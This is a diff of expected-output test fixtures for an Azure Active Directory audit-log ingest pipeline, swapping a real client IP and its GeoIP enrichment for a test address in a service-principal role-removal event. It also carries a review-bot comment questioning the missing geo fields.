"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -3075,25 +2805,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -3107,7 +2819,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -3243,7 +2955,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -3255,12 +2967,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036158700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124918900Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -3286,25 +2998,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -3318,7 +3012,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -3454,7 +3148,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
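Review bot: The regenerated expected output in the `@@ -3286,25 +2998,7 @@` hunk drops the whole `source.geo` and `source.as` objects for 67.43.156.15 instead of replacing them with the lookup result for the new address; if 67.43.156.15 lies inside the ranges the pipeline-test GeoIP database covers, an absent enrichment would point at the geoip processor not being applied to `source.ip` rather than at the fixture, so please confirm against the pipeline before accepting the `-g` output as the new expectation. The same pattern repeats in the hunks at `@@ -3497,25 +3191,7 @@` and `@@ -3708,25 +3384,7 @@`. `ActorIpAddress`, `client.ip`, `client.address`, `related.ip` and the embedded `ClientIP`/`ActorIpAddress` inside `event.original` are all updated consistently, so a single pipeline-test run is enough to settle this.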
@@ -3466,12 +3160,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036164400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
